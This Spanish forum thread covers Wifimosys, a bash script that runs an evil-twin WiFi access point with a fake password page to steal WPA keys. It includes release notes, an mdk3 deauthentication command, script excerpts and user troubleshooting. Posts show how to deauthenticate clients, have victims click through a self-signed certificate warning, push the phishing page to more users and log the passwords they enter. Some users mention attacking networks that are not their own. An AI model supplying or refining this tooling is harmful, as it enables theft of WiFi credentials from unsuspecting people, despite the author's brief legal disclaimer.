En mi opinión para ser perfecto sólo le faltan diferentes index para hacerlo más real aún (Vodafone, Orange, Jazztel, Movistar, etc)
A la espera de sorpresas en tu nueva versión ;D
Un saludo!
He cambiado la desautentificación de aireplay-ng a wifijammer.py (incluído en la 64) y probando la última versión de wifijammer de hace un par de semanas Wifimosys necesita unos pequeños cambios para cerrar el programa (de python a python2). Lo que he subido funciona en Wifislax64 pero si actualizas wifijammer a la última avísame y le hago los retoques al script.
Juraria que la versión actual ya usa WifiHammerHe cambiado la desautentificación de aireplay-ng a wifijammer.py (incluído en la 64) y probando la última versión de wifijammer de hace un par de semanas Wifimosys necesita unos pequeños cambios para cerrar el programa (de python a python2). Lo que he subido funciona en Wifislax64 pero si actualizas wifijammer a la última avísame y le hago los retoques al script.
Da lo mismo, pero obviamente no podrás usar los dos a la vez con un solo adaptador WiFi.
Una consulta: la nueva versión del módulo ya está modificada para que la página fake aparezca también en direcciones "https" ?
Gracias! Saludos!
Vodker, ¿tienes intención de usar el método de desautentificación de siempre en vez de usar wifijammer o tener las dos opciones?
Hola, me gustaría aprovechar este hilo para hacer una consulta sobre mdk3 una de las herramientas que usa linset, me surgió la duda por un comentario que vi en otro foro: hay forma de forzar al modem a que se reinicie y cambie el canal en el que está trabajando? probé con este comando: timeout 360s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -m -c 1 -e XXXXXXXX efectivamente logré el reinicio del modem pero no el cambio del canal, cosa que me dijeron era posible con ese mismo comando
Desafortunadamente para mi Movistar tienen una políticas para el usuario pésimas en Colombia, no facilitan la contraseña de administrador del modem y he llamado a 3 asesores para pedirles un simple cambio de canal del modem por que tengo problemas con un repetidor señal y no han dado con el chiste, lo último que quiero hacer es pedir una visita técnica para algo como eso, por esa razón hago la consulta.Vodker, ¿tienes intención de usar el método de desautentificación de siempre en vez de usar wifijammer o tener las dos opciones?
Le habéis tomado tirria a wifijammer, o algo... hace lo mismo que aireplay, lo mismo.Hola, me gustaría aprovechar este hilo para hacer una consulta sobre mdk3 una de las herramientas que usa linset, me surgió la duda por un comentario que vi en otro foro: hay forma de forzar al modem a que se reinicie y cambie el canal en el que está trabajando? probé con este comando: timeout 360s mdk3 mon0 a -a XX:XX:XX:XX:XX:XX -m -c 1 -e XXXXXXXX efectivamente logré el reinicio del modem pero no el cambio del canal, cosa que me dijeron era posible con ese mismo comando
Si es tu router (como debe ser, y no me digas otra cosa) ¿Por qué complicarse cuando puedes entrar a la configuración y cambiar de canal?
Saludos.
Edito: al fin me atendió un asesor que si sabía donde estaba parado y me resolvió el problema, no se que clase de capacitación le dan al personal de Movistar pero ya planteada la duda me gustaría saber si es posible hacer lo que comenté con mdk3 o alguna otra herramienta.
Tengo una pregunta ...
¿como compruebas la integridad del handshake?
no consigo ninguno valido ..me desocnecto y reconecto incluso manualmente y ni con esas ..siempre handshake "invalido" ..estoy en la revision ultimo que la actualice en la iso.
Hi, can i replace the phrase of the fake page "para volver to conectar introduce the contraseña wifi" with a phrase in italian "per problemi di sicurezza introduca la password wifi". How? Thank you.
Of course, you just have to edit the file usr/bin/wifimosys with a text editor like KWrite and replace the text you choose.
Saludos.
Perdona hermano no la quiero embarrar, pero el texto que puedo modificar, está en la linea 1045?Hi, can i replace the phrase of the fake page "para volver to conectar introduce the contraseña wifi" with a phrase in italian "per problemi di sicurezza introduca la password wifi". How? Thank you.
Of course, you just have to edit the file usr/bin/wifimosys with a text editor like KWrite and replace the text you choose.
Saludos.
Perdona hermano no la quiero embarrar, pero el texto que puedo modificar, está en la linea 1045?
Me alegro de la solución a tu problema. En cuanto a la pregunta, eso de cambiar el canal de un router mediante una herramienta yo no lo he visto jamás
el error se produce al escanear redes. La tarjeta con la que me da el error es una broadcom 43134 con sistema Kali linux
Hay móviles activos. Por ende hay clientes
Hay móviles activos. Por ende hay clientes
No. Si solo están conectados, pero no hay actividad -subir o bajar datos- lo que se ve en la columna #data, como si no los hubiera.
Saludos.
Perdonen, pero esta actualizado el tema de la desautentificacion de que el router cambie de canal?
Perdonen, pero esta actualizado el tema de la desautentificacion de que el router cambie de canal?
Nop. Ya dije que intentaría trabajar en ello durante mis vacaciones (en agosto, en unos días ;D)
Saludos.
el chistep Realtek 8187l , es recomendable para este ataque???, pregunto porque en linset no funciona (por lo que lei)
Pd: soy totalmente nuevo en esto ,disculpas si alguien ya pregunto o si es obvia la respuesta
Vodker va saliendo a la luz la nueva actualización? Si necesitas ayuda te puedo echar una mano
Vodker va saliendo a la luz la nueva actualización? Si necesitas ayuda te puedo echar una mano
Estoy en ello cuando me deja el demonio gafotas que tengo por hija ;D
Ya tengo más que adelantadas algunas cosillas pero hasta que no haga pruebas en diferentes cacharros de amiguetes no publico nada.
¿Ayuda? Claro que la necesito -y mucha, que yo no tengo ni p.i. de programar- pero si me metí en este proyecto es para aprender, y con el viejo método de ensayo y error voy tirando...
Saludos.
Vodker va saliendo a la luz la nueva actualización? Si necesitas ayuda te puedo echar una mano
Estoy en ello cuando me deja el demonio gafotas que tengo por hija ;D
Ya tengo más que adelantadas algunas cosillas pero hasta que no haga pruebas en diferentes cacharros de amiguetes no publico nada.
¿Ayuda? Claro que la necesito -y mucha, que yo no tengo ni p.i. de programar- pero si me metí en este proyecto es para aprender, y con el viejo método de ensayo y error voy tirando...
Saludos.
Perdonen, pero esta actualizado el tema de la desautentificacion de que el router cambie de canal?
Nop. Ya dije que intentaría trabajar en ello durante mis vacaciones (en agosto, en unos día
Aveces borracho se sacan mejor las cosas ;D ;D ;D ;D ;D ;D ;D ;D
Lo he puesto en hostbase de manera muy facil se puede hacer con airodump checkeando los canal en un tiempo que ha entrado el usario.Lo unico es de hacer ojo a el orderen de los canal para eliminar los falsos positivos.
No creas, la he tenido que resubir por un fallo al salir del script... Azn Descargadla de nuevo, please.
Saludos.
function ponemonitor {
if [ $(echo "$PREWIFI" | wc -m) -le 3 ]; then
clear
top
setinterface
fi
readarray -t softwaremolesto < <(airmon-ng check $PREWIFI | tail -n +8 | grep -v "on interface" | awk '{ print $2 }')
WIFIDRIVER=$(airmon-ng | grep "$PREWIFI" | awk '{print($(NF-2))}')
if [ $WIFIDRIVER != rtl8723be ]; then
rmmod -f "$WIFIDRIVER" &>$wifim_output_device 2>&1
fi
for molesto in "${softwaremolesto[@]}"; do
killall "$molesto" &>$wifim_output_device
done
if [ $WIFIDRIVER != rtl8723be ]; then
modprobe "$WIFIDRIVER" &>$wifim_output_device 2>&1
fi
select PREWIFI in $INTERFACES; do
break;
done
echo
echo -ne $white" Poniendo el interface $yellow$PREWIFI$color en modo Monitor..."
WIFIMONITOR=$(airmon-ng start $PREWIFI | grep "enabled on" | cut -d " " -f 5 | cut -d ")" -f 1)
WIFI_MONITOR=$WIFIMONITOR
WIFI=$PREWIFI
limpieza
}
function ponemonitor {
if [ $(echo "$PREWIFI" | wc -m) -le 3 ]; then
clear
top
setinterface
fi
readarray -t softwaremolesto < <(airmon-ng check $PREWIFI | tail -n +8 | grep -v "on interface" | awk '{ print $2 }')
WIFIDRIVER=$(airmon-ng | grep "$PREWIFI" | awk '{print($(NF-2))}')
for molesto in "${softwaremolesto[@]}"; do
killall "$molesto" &>$wifim_output_device
done
rmmod -f "$WIFIDRIVER" &>$wifim_output_device 2>&1
sleep 3
modprobe "$WIFIDRIVER" &>$wifim_output_device 2>&1
select PREWIFI in $INTERFACES; do
break;
done
echo
echo -ne $white" Poniendo el interface $yellow$PREWIFI$color en modo Monitor..."
WIFIMONITOR=$(airmon-ng start $PREWIFI | grep "enabled on" | cut -d " " -f 5 | cut -d ")" -f 1)
WIFI_MONITOR=$WIFIMONITOR
WIFI=$PREWIFI
limpieza
}
primero detener servicios molestos..y despues ya resetear driver..ya no se cuelga.
Uso Wifislax 4.12.final en modo live usb
wifimosys 0.24
Probado tanto con adaptador Ralink RT2870/3070 (rt2800usb) como con adaptador con chip RTL8187L.
Muchas gracias Vodker por compartir tu trabajo.Código: [Seleccionar]
Uso Wifislax 4.12.final en modo live usb
wifimosys 0.24
Probado tanto con adaptador Ralink RT2870/3070 (rt2800usb) como con adaptador con chip RTL8187L.
He querido probar el wifimosys (no lo habia probado hasta la fecha) y todo bien salvo que cuando intento que me redirija a la web donde hay que meter la password WPA no hay forma de conseguir que se abra la pagina web (en el navegador pongo webs http , nada de https ) , no se si solo me pasa a mi
Con Linset y con fluxion no tengo ese problema y me funcionan perfectamente, gracias
Muchas gracias Vodker por compartir tu trabajo.Código: [Seleccionar]
Uso Wifislax 4.12.final en modo live usb
wifimosys 0.24
Probado tanto con adaptador Ralink RT2870/3070 (rt2800usb) como con adaptador con chip RTL8187L.
He querido probar el wifimosys (no lo habia probado hasta la fecha) y todo bien salvo que cuando intento que me redirija a la web donde hay que meter la password WPA no hay forma de conseguir que se abra la pagina web (en el navegador pongo webs http , nada de https ) , no se si solo me pasa a mi
Con Linset y con fluxion no tengo ese problema y me funcionan perfectamente, gracias
PD: Yo estoy teniendo el problema de que no consigo el handshake ni de broma, me pone que esta incompleto. Ya lo he intentado unas 20 veces, desconectando el PC y el móvil aproposito para conseguirlo antes y nada :-\ esta demasiado estricto?
(una cosa curiosa, el movil me vuelve a pedir la clave del wifi, menos mal que tengo una contraseña facil para pruebas sino me muero xD)
Por cierto una pregunta, al cambiar de canal sigue el ataque? o simplemente detecta que no esta ya en el canal de antes y se detiene el programa?
Si el handshake está incompleto, es que está incompleto (no es un four-way handshake), qué se le va a hacer...
Al cambiar de canal se para el ataque.
Saludos.
Para un router de pruebas que tengo ;D
Una pena que no pueda continuar el ataque en el nuevo canal :(
Sin embargo si lanzo handshaker con aireplay-ng consigo el handshake en unos pocos segundos.
Vodker, veo que la ventana web que has abierto para probar e introducir la contraseña WPA es la del mismo PC... ¿ Lo has intentado desde un movil, ipad conectado al falso AP a ver si se abre la web para introducir la contraseña ? Yo es aqui donde tengo el problema, que no me abre la web....en los demas procesos no, todos arrancan y estan en marcha de la misma manera que aparecen en la pantalla que has capturado.
. Hola vodker que tal, primero agradecerte por tu paciencia y por las ganas que le pones al proyecto, la versión que paraba el scrip y continuaba cuando cambiaba de canal que versión es la 0.22??
Para un router de pruebas que tengo ;D
Una pena que no pueda continuar el ataque en el nuevo canal :(
Ya hice una versión que paraba el script, aguardaba unos segundos y continuaba en el nuevo canal, pero... en el caso de que apagamos el router porque creemos que algo va mal... ¿a qué canal diriges el ataque?
Entonces añadí que si el canal era "ninguno" paraba y punto. Al final opté por la opción de simplemente pararlo cuando cambiaba o desaparecía el canal del AP original, es menos agresivo.
Saludos.
Vodker, veo que la ventana web que has abierto para probar e introducir la contraseña WPA es la del mismo PC... ¿ Lo has intentado desde un movil, ipad conectado al falso AP a ver si se abre la web para introducir la contraseña ? Yo es aqui donde tengo el problema, que no me abre la web....en los demas procesos no, todos arrancan y estan en marcha de la misma manera que aparecen en la pantalla que has capturado.
Creo que Handshaker no comprueba la integridad de la captura.No la comprueba pero el caso es que con todo a favor (corta distancia y generando voluntariamente abundantes paquetes de trafico) el handshake capturado es bueno, de hecho luego compruebo PSK sin problema. Me parece extraño que en las mismas circunstancias wifimosys no capture el handshake o no lo valide porque no lo considere integro. De los tres estados de pyrit eso solo deberia ocurrir con "bad" pero ni con "good" ni con "workable".
Quien dice que tenemos que fijar nos a el ssid del AP ?
Si se oculta el ssid no puede ocultarse el bssid ;)
Cuanto colorin , muy mono. Por cierto, cual es la leyenda de colores. Significan algo
Si no eres rastafari no.(http://i.imgur.com/VzXpFgh.jpg)
vodker cual es esa versión ??que continuaba el ataque luego de que cambiaba de canal ??
Para un router de pruebas que tengo ;D
Una pena que no pueda continuar el ataque en el nuevo canal :(
Ya hice una versión que paraba el script, aguardaba unos segundos y continuaba en el nuevo canal, pero... en el caso de que apagamos el router porque creemos que algo va mal... ¿a qué canal diriges el ataque?
Entonces añadí que si el canal era "ninguno" paraba y punto. Al final opté por la opción de simplemente pararlo cuando cambiaba o desaparecía el canal del AP original, es menos agresivo.
Saludos.
Para los que les tira el error $MONDEV up, les comento que yo primero abro el Geminis Auditor, este resetea la tarjeta WiFi, espero a que haga la búsqueda, selecciono cualquier red y luego me voy a salir, y luego abro el Wifimosys y no me tira el error $MONDEV up
Hola. He probado wifimosys y no hay forma de que me salga la página para introducir la clave, ni en el PC ni en el smartphone.
En cambio, con Linset y Fluxion si que aparecen.
¿A que puede ser debido esto?
Hola. He probado wifimosys y no hay forma de que me salga la página para introducir la clave, ni en el PC ni en el smartphone.
En cambio, con Linset y Fluxion si que aparecen.
¿A que puede ser debido esto?
Precisamente la última versión (0.25) es la que ha tenido más pruebas en diferentes dispositivos. ¿Es esa la que usas?
Casi siempre, la víctima abandona el uso del teléfono, sin llegar a la página falsa...
Porque no saben lo que les está pasando, por ejemplo, abrieron la página de Facebook, wifi señal completa, conectada - página en blanco... luego se trasladan a otros páginas en Twitter y Viber - página en blanco... se desconectan del wifi y repiten lo mismo... un hombre hasta sacó la batería del teléfono... y ni siquiera vienen a abrir una página falsa, que ofrece la "salvación"...
Casi siempre, la víctima abandona el uso del teléfono, sin llegar a la página falsa...
Porque no saben lo que les está pasando, por ejemplo, abrieron la página de Facebook, wifi señal completa, conectada - página en blanco... luego se trasladan a otros páginas en Twitter y Viber - página en blanco... se desconectan del wifi y repiten lo mismo... un hombre hasta sacó la batería del teléfono... y ni siquiera vienen a abrir una página falsa, que ofrece la "salvación"...
Síiii, sería genial que, cuando la persona ingresa a una página que comienza con "https", automáticamente sea redirigido a cualquier web "http" (algún servicio en http, como comentó koala633) y de esa forma vea correctamente la página fake e ingrese la contraseña.
¿tiene la oportunidad de hacer el programa wifimosys en inglés o ruso?
la ventana de diálogo con el cliente no se entiende en español.
Buen día a todos.
Estimado Vodker, ¿tiene la oportunidad de hacer el programa wifimosys en inglés o ruso? Una buena mitad del mundo estaría agradecido por esto. Dado que el firmware de los módems está en su mayoría en inglés. En la parte oriental del globo, la ventana de diálogo con el cliente no se entiende en español.
what is the line you have to modify?
how to test the program without a real access point and without real connected clients in order to check visually the dialogue window with the client (the correctness of the translation)?
No muestra letras rusas.
No muestra letras rusas.
ISO-8859-1 (latin-1)
Saludos.
Y otra pregunta: ¿puedo volver a compilar ISO con mi archivo corregido?
Y otra pregunta: ¿puedo volver a compilar ISO con mi archivo corregido?
Ese tema ya no va en este hilo, pero seguro que si buscas por este foro ya existe una respuesta. Saludos.
Hola. He probado wifimosys y no hay forma de que me salga la página para introducir la clave, ni en el PC ni en el smartphone.
En cambio, con Linset y Fluxion si que aparecen.
¿A que puede ser debido esto?
Precisamente la última versión (0.25) es la que ha tenido más pruebas en diferentes dispositivos. ¿Es esa la que usas?
Si. He probado la 0.25, pero no funciona. ¿Será el adaptador? Tengo la antena AWUS036H.
Hola. Yo llevo varios dias utilizando LINSET con una Alfa 1w chip 8187L y no consigo ningún resultado , ni si quiera capturar el handshake. He probado con varias redes de mi familia y no consigo nada. Alguna sugerencia ?? Gracias.Ver si la tarjeta entra en modo monitor? ¿El mapa entra en modo monitor? Escriba el comando airmon-ng.
Hola. Yo llevo varios dias utilizando LINSET con una Alfa 1w chip 8187L y no consigo ningún resultado , ni si quiera capturar el handshake. He probado con varias redes de mi familia y no consigo nada. Alguna sugerencia ?? Gracias.
Hola vodker.... uso el linset, fluxion y el wifimosys, pero no logran auditar una red.... pasa que he descubierto q cada aunque logro el handshake, el cliente se conecta al Fake, pronto se detiene... reinicio el escaneo y veo a slo clientes conectados, pero con OTRO canal; vuelvo iniciar el ataque... y lo mismo; no hay forma de saltarse eso? otra cosa, he visto en otros foros que existe un linset que ESCONDE la red original para hacer mas efectivo el ataque, eso ya es posible? Un saludo y gracias por la pronta respuesta! >:(
Perdon x los duplicados, evitaré hacerlo en el futuro... cuando dices que la version 0.25 de wifimosys contempla ese problema, es para avisar q NO SE PUEDE atacar esa red, o es porque tiene elementos que pueden que pueden superarlo? muchas gracias!Hola vodker.... uso el linset, fluxion y el wifimosys, pero no logran auditar una red.... pasa que he descubierto q cada aunque logro el handshake, el cliente se conecta al Fake, pronto se detiene... reinicio el escaneo y veo a slo clientes conectados, pero con OTRO canal; vuelvo iniciar el ataque... y lo mismo; no hay forma de saltarse eso? otra cosa, he visto en otros foros que existe un linset que ESCONDE la red original para hacer mas efectivo el ataque, eso ya es posible? Un saludo y gracias por la pronta respuesta! >:(
Primero, no preguntes varias veces lo mismo por diferentes secciones. Te he borrado los duplicados puesto que es la misma cuestión.
Segundo, Wifimosys en su última versión 0.25 ya contempla el problema del cambio de canal de los routers, avisa y para el ataque.
Tercero, ¿ocultar la red original? ¿Cómo? ¿Y por qué, ya que no es funcional puesto que está siendo atacada?
Saludos.
Buenas tardes, Vodker. ¿Puedo agregar un macchanger al programa, que cambiaría automáticamente la dirección del mac del adaptador?
Buen día, querido Vodker. ¿Podría agregar a esta página un elemento de menú adicional
Si el ataque no tiene éxito, debe reiniciar todo el script.
Saludos!
Desde que apareció LINSET han ido sucediéndose bastantes clones más o menos afortunados. Creo haberlos probado todos y tengo la sensación de que en lugar de mejorarlo lo han complicado hasta el absurdo.
Quizá por ello hace tiempo que me hice una versión personalizada del script de vk496 que he ido toqueteando aquí y allá hasta dejarla lo más limpia posible.
Bueno, pues hoy, con la salida de Wifislax 4.12 he decidido ponerla a disposición de todos por si a alguien le puede ser útil.
¿En que consisten las mejoras?
- Ocupa menos espacio que el original (266 kb contra solo 35) y está mucho más optimizado.
- Las páginas que carga el destinatario del ataque también se reducen mucho incrementando así su velocidad. Con LINSET (y sus clones) había que enviarle a la víctima 1,5 Mb (muchos no lograban cargarla y eso malograba el ataque) y ahora apenas son 45 kb. ;)
- Se opta por lo seguro y solo se comprueba el handshake con pyrit, con lo que la posibilidad de error es prácticamente nula.
- He quitado idiomas y demás zarandajas innecesarias para nosotros. El código es libre, quien desee incluir su idioma, ya sabe, manos a la obra.
- Menús reducidos y mucho más claros. Ya no hay que hacer tantas selecciones.
- Los handshakes se guardan con su ESSID para su mejor acceso en posteriores ataques.
- No hay ninguna página que simule marcas de routers. Ese era el deseo de vk496 y siempre lo he respetado. Además, no son necesarias.
- Se puede ver en tiempo real una lista de las contraseñas erróneas introducidas (ideal para comprobar su funcionamiento).
- Está optimizado para Wifislax. Colocar el script en la carpeta /usr/bin/ y ejecutar desde consola ( wifimosys )
También hay cosas menos buenas como que no carga páginas HTTPS (ni wifimosys ni ninguno), pero llevo unos días haciendo pruebas con modificaciones del script sobre Apache en lugar de Lighttpd con resultados alentadores. ;)
No me enrollo más, quien quiera probarlo lo tiene en https://github.com/Vodker/wifimosys (https://github.com/Vodker/wifimosys), ahí también está como módulo para Wifislax, con su ridículo nombre y su ridículo peso (12 kb) ;D
Saludos de nuevo y gracias a todos.
ACTUALIZACIÓN 20-08-2017: Subida versión 0.25 (y supongo que última)
Se muestra la actividad de la red (#datas) en la pantalla de selección de Puntos de acceso.
Mejor y más rápida asignación de IP por parte del servidor DHCP (ya no hay "unknown lease...).
Pyrit acepta handshakes incompletos pero "workables".
Corregidos algunos errores menores (expresiones que a veces fallaban, incorrecta salida del script...)
Se ha hecho una limpieza del código, ahora es algo más legible.
ACTUALIZACIÓN 15-08-2017: Subida versión 0.24
Parece ser que se arrastraba un viejo problema con determinados drivers a la hora de resetear el interface y daba error (ifconfig $MONDEV up).
Gracias a USUARIONUEVO ya está corregido.
ACTUALIZACIÓN 13-08-2017: Subida versión 0.23
--- Errores corregidos (o eso espero):
"read(file header) failed: Success" - Lo producía aircrack cuando encontraba archivos de cero bytes. Solucionado chequeando antes los bytes del archivo.
Ya no sale del script cuando se carga un handshake guardado que no corresponde a la red objetivo.
Ya no se muestran los AP con canal -1 ya que eran imposibles de escanear con airmon.
--- Cambios menores:
Cambiado colores del index del Falso AP. Ahora es texto blanco sobre fondo negro.
Cambiado selección de menú "reescanear" de "r" a "0". Una chorrada, pero ya no hay que apartar las manos del teclado numérico.
Deauth solo con mdk3. En mis pruebas va mejor WifiJammer y así lo tengo en mi versión privada. Pero si os gusta este otro...
El chequeo del handshake vuelve a ser estricto. Había fallos de un 2%, pero los había. Cuesta un poco más conseguir el hs pero vale la pena.
Captura normal del handshake ampliada a de 15 a 20 seg. Otra chorradita, pero 15 era poco en ocasiones.
---Nuevas funcionalidades:
Certificado SSL autofirmado. El navegador sigue detectando una página falsa, pero ahora el usuario puede hacer clic y saltarse el mensaje ^-^
Mejor detección de redes ocultas y sus handshakes. Si seleccionamos una red oculta y hay clientes, detecta el nombre automáticamente.
Monitorización de cambio de canal del AP original. El script finaliza si el router ha cambiado de canal (y nos avisa de qué canales han cambiado)
ACTUALIZACIÓN 04-05-2017: Subida versión 0.22
- Modificado método de deatuth, ahora con wifijammer
- Ahora se obtiene el handshake más fácilmente siendo el método de comprobación más permisivo
ACTUALIZACIÓN 21-12-2016: Subida versión 0.21
- Se elimina el chequeo de dependencias. Está más que probado que todas están en Wifislax. El que quiera poner el script en otro sistema, allá él.
- Corregido un molesto bug por el que en ocasiones salía un mensaje por pantalla.
- Ahora si usamos una sola tarjeta wireless ya no hace falta seleccionarla, la autodetecta y la pone en modo monitor.
- Mejor automatización del proceso de captura del handshake.
- Añadido el "Modo obstinado" en la detección del handshake ( busca hasta 5 minutos y procede a validarlo si lo encuentra antes).
- Cambio de algunos mensajes y chorradas estéticas.
ACTUALIZACIÓN 19-12-2016: Subida versión 0.20
( Ahora detecta automáticamente si se capturó el handshake y procede en consecuencia ;D )
PREGUNTAS FRECUENTES:
- ¿Y cómo se usa esto?
Con Wifislax 4.XX colocas el script en la carpeta /usr/bin/ de Wifislax y lo ejecutas desde una terminal poniendo wifimosys, o usas el módulo y lo tendrás desde el menú (Wifislax - WPA). Si tienes y usas el nuevo Wifislax 64 ya tienes Wifimosys en el menú junto al resto de herramientas.
- No me captura el handshake o siempre está corrupto, ¿qué hago?
Dependiendo de la marca y modelo del router puede ser más o menos complicado pero siempre acaba saliendo. Wifimosys ha elegido ser muy estricto con los handshakes para que cuando se obtengan se guarden y sean válidos para cualquier otra herramienta de auditoría. La solución es volver a intentarlo hasta que te salga uno bueno. A veces cuesta. A veces no.
- Me paso esperando mucho tiempo y no se conecta nadie al falso AP ¿hago algo mal?
No, no haces nada mal, pero eso no está en mis manos ni en las tuyas. Depende del que se tiene que conectar, así que paciencia y si te hartas de esperar prueba en otro momento.
- Vale, he sido paciente y ya veo conexiones. Pero ahora no me da el password ¿Esto funciona de verdad?
Claro que funciona (compruébalo tú en tu red) pero depende de factores que no controlamos. Ya sabes que no funciona con páginas HTTPS, así que si tu víctima solo conecta a Gmail, Facebook, Twitter, etc. pues no tendrás ningún resultado ya que ni él mismo podrá ver tu página fake. Habrás de esperar.
- Te hice caso y ya tengo contraseñas. ¡Gracias!
Enhorabuena, pero ahora lo correcto sería avisar a esa persona que ha "picado" tu anzuelo de lo vulnerable que resulta su red wifi si actúa de esa manera y va regalando sus contraseñas por ahí. Cualquier otra acción en la que te aproveches de tener esa contraseña está mal y puede que sea delito. Pero bueno, tú mismo. Desde luego yo no te recomiendo otra cosa más que lo que te dicho antes: contactar y poner sobre aviso al usuario de su debilidad. Hacer auditorías es divertido, quebrantar la ley solo trae problemas.
- ¿Próximamente se actualizará con soporte a páginas HTTPS?
En eso estoy trabajando entre otras mejoras. Échale un ojo de vez en cuando a estas páginas por si acaso.
- ¿Me das algún consejillo para tener éxito con esto?
Has de estar cercano y tener muy buena señal del AP que atacas, prueba en los momentos en que hay más tráfico en la red (#datas) y no olvides que esto es auditoría y diversión. Ahí radica el éxito.
NOTA: NO contestaré a mensajes privados sobre el script. Esto es un foro y cuanto más compartamos todos, mejor funcionará.
Hice pruebas con Delorean (https://github.com/PentesterES/Delorean (https://github.com/PentesterES/Delorean)), pero nada.
Seguiremos buscando alternativas.
Saludos.
hola,tanto con la final como en la ultima de testeo no funciona,no se si sera por la actualizacion de aircrack
hola,tanto con la final como en la ultima de testeo no funciona,no se si sera por la actualizacion de aircrack
Abandoné el proyecto hace meses pero igual le echo un vistazo únicamente para arreglar temas de compatibilidad con el nuevo Wifislax. Ya me lo planteé hace un tiempo pero me dio la impresión de que el deseo de USUARIONUEVO era prescindir de este tipo de scripts en la distro.
En fin, yo lo intentaré retocar por motivos personales y ya se irá viendo.
Saludos.
Hostbase esta implicado en este cambio ?
Me recuerda que habia hecho todo con airmon-zc hasta ahora.
Bueno, pues por ahora funcionando y probada en la nueva distro de hoy mismo. Faltan mejorar cosillas pero todo se andará.
Saludos.
(https://fotos.subefotos.com/b79b4822c1663f8fbdd8f0ae3196d938o.png)
hola,tanto con la final como en la ultima de testeo no funciona,no se si sera por la actualizacion de aircrack al seleccionar me sale esto
##########################################################
# #
# WIFIMOSYS 0.25 by Absolut Vodker #
# WIFI MOron' SYStem #
# #
# Basado en LINSET de vk496 para seguridadwireless.net #
# #
##########################################################
wc: /tmp/Wifimosys/dump-01.csv: No existe el fichero o el directorio
/usr/bin/wifimosys: línea 329: [: -le: se esperaba un operador unario
cat: /tmp/Wifimosys/dump-01.csv: No existe el fichero o el directorio
expr: error de sintaxis
LISTADO DE REDES
Nº DATAS DIRECCIÓN MAC CH TIPO PWR NOMBRE DE LA RED
/usr/bin/wifimosys: línea 353: [: : se esperaba una expresión entera
En rojo: redes con posibles clientes conectados
Selecciona el nº de la red a atacar...
(Para reescanear pulsa 0. Para salir pulsa X)
#>
Le faltaban dependencias.¿que depencias faltaban? deberiais ponerlas para que los demás lo sepan
Le faltaban dependencias.¿que depencias faltaban? deberiais ponerlas para que los demás lo sepan
Bueno, pues por ahora funcionando y probada en la nueva distro de hoy mismo. Faltan mejorar cosillas pero todo se andará.
Saludos.
Para cuando estará lista 0.26 de wifimosys y muchas gracias por vuestro gran trabajo.
(https://fotos.subefotos.com/b79b4822c1663f8fbdd8f0ae3196d938o.png)
Hola Vodker
por favor continua con el desarrollo de wifimosys
Hola Vodker
por favor continua con el desarrollo de wifimosys
Pues lo siento pero por ahora va a ser que no. Ahora mismo no se dan las condiciones para que Wifislax incluya scripts de ese tipo.
Saludos.
Hola Vodker
por favor continua con el desarrollo de wifimosys
Pues lo siento pero por ahora va a ser que no. Ahora mismo no se dan las condiciones para que Wifislax incluya scripts de ese tipo.
Saludos.
Quisiera saber si hay alguna version de wifislax que incorpore WIFIMOSYS 0.25
Yo uso la version wifislax64-1.1-final.iso pero ahi esta la version WIFIMOSYS 0.22 y quisiera usar la mas actual
Quisiera saber si hay alguna version de wifislax que incorpore WIFIMOSYS 0.25
Yo uso la version wifislax64-1.1-final.iso pero ahi esta la version WIFIMOSYS 0.22 y quisiera usar la mas actual
Puedes descargar el módulo de la 0.25 y ponerlo en ese Wifislax: https://github.com/Vodker/wifimosys
Saludos.
Una vez descargado el módulo desde donde te he dicho antes (archivo .XZM) lo copias tal cual está en el pincho USB en la carpeta wifislax64/modules/ y yastá.
Saludos.
Hola buenas!!a mi tambien me da ese error
Estoy probando wifimosys 0.25 con AWUS036H (8187L) y con AWUS036NH (3070), pero sólo consigo que wifimosys funcione correctamente en ésta última, AWUS036NH.
En la AWUS036H Wifimosys consigue desconectar mi movil del wifi sin problemas, y captura el handshake, pero no crea ningun AP falso al que redirigirme. Al intentar conectarme al AP original me marca continuamente contraseña incorrecta, pero no pasa de ahí.
Alguien sabe decirme donde se puede originar el problema? tiene más compatibilidad con wifimosys el chipset 3070 que el 8187l?
Muchas gracias por vuestros aportes.
Edito:
he visto que a la hora de hacer el ataque me genera el siguiente error:
(https://preview.ibb.co/dTymc0/IMG-3267.jpg) (https://ibb.co/ftqMAL)
Para un router de pruebas que tengo ;D
Una pena que no pueda continuar el ataque en el nuevo canal :(
Ya hice una versión que paraba el script, aguardaba unos segundos y continuaba en el nuevo canal, pero... en el caso de que apagamos el router porque creemos que algo va mal... ¿a qué canal diriges el ataque? Entonces añadí que si el canal era "ninguno" paraba y punto. Al final opté por la opción de simplemente pararlo cuando cambiaba o desaparecía el canal del AP original, es menos agresivo.
Saludos.
hola, alguien puede decirme al ultima version de wifislax que lleve wifimosys?¿ gracias anticipadashttps://github.com/Vodker/wifimosys ahi estan todas la ultima tambien solo vale para versiones hasta wifislax 64 1.1
Buenos días Vodker
Por favor podrías publicar el código de Wifimosys para trabajar con interfaces wlan0mon en vez de interfaces mon0
Saludos Chicos de Wifislax y Gracias por vuestro gran trabajo >:( >:( >:(
aqui ests el codigo https://github.com/Vodker/wifimosys ahi estan todas las versiones hasta la ultima 0,25
ya que queres hacer cambios actualizar por que no tocas function monitoreo ya que ahora el cambio canal se apaga script y lo ideal seria algo como lo de argeddon que cambia canla y resetea el ataque